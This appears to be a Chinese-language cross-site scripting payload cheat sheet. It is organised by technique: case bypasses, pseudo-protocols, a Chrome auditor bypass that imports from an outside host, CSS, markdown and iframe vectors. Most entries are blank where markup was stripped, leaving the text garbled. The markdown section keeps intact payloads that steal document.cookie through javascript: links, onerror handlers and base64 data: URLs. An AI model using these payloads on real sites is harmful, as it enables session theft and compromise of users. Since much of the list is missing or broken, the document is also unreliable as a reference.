Payload ================================ 常用 --------------------------------------------------- - ```` - ```` - ```` - ``M`` - ```` - ``M`` - ```` - ``
`` - ```` 大小写绕过 --------------------------------------------------- - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` 各种alert --------------------------------------------------- - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` - ```` 伪协议 --------------------------------------------------- - ``M`` - ``M`` - ``M`` - ``M`` Chrome XSS auditor bypass --------------------------------------------------- - ``?param=https://¶m=@z.exeye.io/import%20rel=import%3E`` - ``M`` - ```` 长度限制 --------------------------------------------------- :: \... jquery sourceMappingURL --------------------------------------------------- ```` 图片名 --------------------------------------------------- ``">.gif`` 过期的payload --------------------------------------------------- - src=javascript:alert基本不可以用 - css expression特性只在旧版本ie可用 css --------------------------------------------------- ::
markdown --------------------------------------------------- :: [a](javascript:prompt(document.cookie)) [a](j a v a s c r i p t:prompt(document.cookie)) <javascript:alert('XSS')> ![a'"`onerror=prompt(document.cookie)](x) [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=) ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=) iframe --------------------------------------------------- :: `` - ```` - ```` - ```` - ```` - ``